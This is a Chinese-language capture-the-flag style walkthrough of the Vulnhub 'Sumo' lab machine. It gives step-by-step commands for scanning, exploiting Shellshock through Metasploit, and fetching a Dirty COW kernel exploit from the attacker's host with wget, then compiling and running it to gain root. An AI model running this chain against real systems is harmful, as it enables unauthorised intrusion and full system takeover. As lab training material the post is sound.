[網絡安全學習篇78]:Sumo: 1.1 Vulnhub 實戰(髒牛漏洞提權)

往期博文:

[網絡安全學習篇69]:滲透測試實戰-DC-1-靶機入侵

[網絡安全學習篇70]:滲透測試實戰-DC-2-靶機入侵

[網絡安全學習篇71]:滲透測試實戰-DC-3-靶機入侵

[網絡安全學習篇72]:滲透測試實戰-DC-4-靶機入侵

[網絡安全學習篇73]:滲透測試實戰-DC-5-靶機入侵

[網絡安全學習篇74]:滲透測試實戰-DC-6-靶機入侵

[網絡安全學習篇75]:滲透測試實戰-DC-7-靶機入侵

[網絡安全學習篇76]:滲透測試實戰-DC-8-靶機入侵

[網絡安全學習篇77]:滲透測試實戰-DC-9-靶機入侵

[網絡安全學習篇78]:Sumo: 1.1 Vulnhub 實戰(髒牛漏洞提權)(本篇)

下期博文:

[網絡安全學習篇79]:Geisha: 1 Vulnhub 實戰

目錄

網絡掃描

攻擊

髒牛-提權

拿到flag


網絡掃描

arp-scan -l

nmap -A 192.168.1.174 -p-

nikto 掃描網站漏洞

nikto -h http://192.168.1.174

攻擊

使用msf 查找此漏洞的攻擊模塊

 

use exploit/multi/http/apache_mod_cgi_bash_env_exec

set RHOSTS 192.168.1.174

set TARGETURI /cgi-bin/test

exploit

髒牛-提權

掃描是否存在髒牛漏洞腳本scan-dirtycow.sh

https://github.com/aishee/scan-dirtycow/blob/master/dirtycowscan.sh

exp:dirty.c

https://www.exploit-db.com/raw/40839

kali 本地開啓http 服務

python -m SimpleHTTPServer

遠程訪問kali 並下載腳本文件,掃描,發現存在髒牛漏洞

wget http://192.168.1.164:8000/scan-dirtycow.sh

chmod 777 scan-dirtycow.sh

./scan-dirtycow.sh

漏洞利用

遠程下載exp,編譯

wget http://192.168.1.164:8000/dirty.c

chmod 777 dirty.c

gcc -pthread dirty.c -o dirty -lcrypt

拿到flag

./dirty testpasswd

su firefart

testpasswd

參考博文:

https://cyb3rbl0g.github.io/sumo-vulnhub-walkthrough/

https://www.vulnhub.com/

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章